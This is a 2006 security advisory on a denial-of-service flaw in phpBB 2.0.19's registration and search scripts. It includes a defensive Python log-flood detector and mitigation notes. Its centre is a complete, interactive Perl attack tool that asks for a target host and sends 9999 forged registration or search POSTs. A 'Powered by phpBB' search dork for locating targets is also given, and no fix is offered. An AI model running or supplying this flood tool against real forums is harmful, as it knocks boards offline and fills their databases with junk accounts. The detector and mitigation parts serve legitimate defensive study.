
HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability



------------------------------------------------------ 
      HYSA-2006-001 h4cky0u.org Advisory 010 
------------------------------------------------------ 
Date - Wed Jan 25 2006 



TITLE: 
====== 


phpBB 2.0.19 search.php and profile.php DOS Vulnerability 



SEVERITY: 
========= 


High 



SOFTWARE: 
========= 


phpBB 2.0.19 and prior 



INFO: 
===== 


phpBB is a high powered, fully scalable, and highly customizable 
Open Source bulletin board package. phpBB has a user-friendly 
interface, simple and straightforward administration panel, and 
helpful FAQ. Based on the powerful PHP server language and your 
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, 
phpBB is the ideal free community solution for all web sites. 


Support Website : http://www.phpbb.com 



BUG DESCRIPTION: 
================ 


The bug was originally found by HaCkZaTaN of NeoSecurityteam. The 
original exploit code can be found at - 


http://h4cky0u.org/viewtopic.php?t=637 


The original exploit affected only versions up to phpBB 2.0.15. It has been
recoded so that it also works against the latest version. The bug resides
in the following two scripts:


profile.php << By registering as many users as you can. 
search.php << By searching in a way that the db cannot understand. 
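Both floods described above leave the same footprint on the server side: a burst of POST requests to profile.php or search.php from one client inside a short time window. The following Python script is added here as an example and is not part of the advisory, the PoC, or phpBB itself. It parses Apache combined-format access-log lines (the sample traffic is constructed inline, with addresses from documentation ranges) and flags any client that sends at least 10 POSTs to either script within 60 seconds; the threshold, window, paths and addresses are assumptions to be tuned to a real board's traffic.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache "combined" access-log format; timestamps look like 25/Jan/2006:10:00:00 +0000.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The two phpBB 2.0.x scripts the advisory names as flood targets.
WATCHED_SCRIPTS = {"profile.php", "search.php"}


def parse_line(line):
    """Return (ip, timestamp, method, script) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    # "/phpBB2/search.php?mode=results" -> "search.php": drop the query string and directories
    script = m.group("path").split("?", 1)[0].rsplit("/", 1)[-1]
    return m.group("ip"), ts, m.group("method"), script


def find_floods(lines, threshold=10, window=timedelta(seconds=60)):
    """Sliding-window count of POSTs per (client IP, script).

    Returns {(ip, script): peak} for every pair whose POST count inside some
    `window` reached `threshold`, where peak is the highest count observed.
    The defaults are assumptions; tune them to the board's normal traffic.
    """
    events = []
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[2] == "POST" and parsed[3] in WATCHED_SCRIPTS:
            events.append(parsed)
    events.sort(key=lambda e: e[1])          # logs are usually ordered, but do not rely on it

    recent = defaultdict(deque)              # (ip, script) -> timestamps inside the window
    peaks = {}
    for ip, ts, _method, script in events:
        key = (ip, script)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:            # evict timestamps older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks


def build_sample_log():
    """Constructed sample traffic (not real data): one client hammering profile.php
    the way the PoC does, one client running searches at a normal rate, and
    background page views. All addresses are from documentation ranges."""
    base = datetime(2006, 1, 25, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 4096 "-" "Mozilla/5.0"'

    def line(ip, offset, method, path):
        stamp = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return fmt.format(ip=ip, ts=stamp, method=method, path=path)

    lines = [line("203.0.113.5", i, "POST", "/phpBB2/profile.php") for i in range(30)]
    lines += [line("198.51.100.7", 100 * i, "POST", "/phpBB2/search.php?mode=results") for i in range(6)]
    lines += [line("192.0.2.9", 7 * i, "GET", "/phpBB2/viewtopic.php?t=637") for i in range(20)]
    lines.append("this line is not in combined format and must be skipped")
    return lines


if __name__ == "__main__":
    for (ip, script), peak in sorted(find_floods(build_sample_log()).items()):
        print(f"ALERT {ip} -> {script}: {peak} POSTs inside one window")
```

Run against the sample, only the registration flood from 203.0.113.5 is reported; the search client never exceeds one POST per window. The PoC's own prompt points at the first mitigation for the profile.php variant: it only offers that flood when Visual Confirmation is disabled, so enabling it in the board's registration settings removes the unattended-registration path. The search.php variant is not covered by that setting, so per-client request-rate limits on the web server or reverse proxy, fed by a detector like this one, are the practical stopgap while no code fix exists.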



Proof Of Concept Code: 
====================== 


#!/usr/bin/perl 
####################################### 
## Recoded by: mix2mix and Elioni of http://ahg-khf.org 
## And h4cky0u Security Forums (http://h4cky0u.org) 
## Name: phpBBDoSReloaded 
## Original Author: HaCkZaTaN of Neo Security Team 
## Tested on phpBB 2.0.19 and earlier versions 
## Ported to perl by g30rg3_x 
## Date: 25/01/06 
####################################### 
use IO::Socket; 


## Initialize the loop counter X 
$x = 0; 


print q( 
  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN 
  Recoded by Albanian Hackers Group & 
  h4cky0u Security Forums 


); 
print q(Host |without-> http://www.| ); 
$host = <STDIN>; 
chop ($host); 


print q(Path |example-> /phpBB2/ or /| ); 
$pth = <STDIN>; 
chop ($pth); 


print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| ); 
$type = <STDIN>; 
chop ($type); 


## Type 1: registration flood 
if($type == 1){ 


## User Loop for 9999 loops (enough for Flood xDDDD) 
while($x != 9999) 
{ 


## Member name that gets registered automatically, suffixed with "X" 
$uname = "username=AHG__" . "$x"; 


## E-mail address registered in the database, suffixed with "X" 
$umail = "&email=AHG__" . "$x"; 


$postit = 
"$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
 


$lrg = length $postit; 


my $sock = new IO::Socket::INET ( 
                                 PeerAddr => "$host", 
                                 PeerPort => "80", 
                                 Proto => "tcp", 
                                ); 
die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; 


## Send the HTTP request that registers a user on the phpBB forum through the socket 
print $sock "POST $pth"."profile.php HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; 
print $sock "Referer: $host\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 


## Print a "+" for every loop 
syswrite STDOUT, "+"; 


$x++; 
} 


## Type 2: search flood 
} 
elsif ($type == 2){ 


while($x != 9999) 
{ 
## Final Search String to Send 
$postit = 
"search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
 


## POST body length 
$lrg = length $postit; 


## Connect Socket with Variables Provided By User 
my $sock = new IO::Socket::INET ( 
                                 PeerAddr => "$host", 
                                 PeerPort => "80", 
                                 Proto => "tcp", 
                                ); 
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 


## Send the HTTP request carrying the malformed search to the phpBB forum through the socket 
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
print $sock "Referer: $host\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 


## Print a "+" for every loop 
syswrite STDOUT, "+"; 


## Increment X in One for every Loop 
$x++; 
} 
}else{ 
## Unknown flood type: what did you type? 
   die "Mundësia nuk Lejohet +_-???\n"; 
} 



FIX: 
==== 


No fix is available as of this date. 



GOOGLEDORK: 
=========== 


"Powered by phpBB" 



CREDITS: 
======== 


- This vulnerability was discovered and researched by HaCkZaTaN of 
NeoSecurityteam. 



- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest 
release of the script - 


Web : http://ahg-khf.org 


mail : webmaster at ahg-khf dot org 



- Co Researcher - 


h4cky0u of h4cky0u Security Forums. 


mail : h4cky0u at gmail dot com 


web : http://www.h4cky0u.org 



ORIGINAL ADVISORY: 
================== 


http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt 


-- 
http://www.h4cky0u.org 
(In)Security at its best...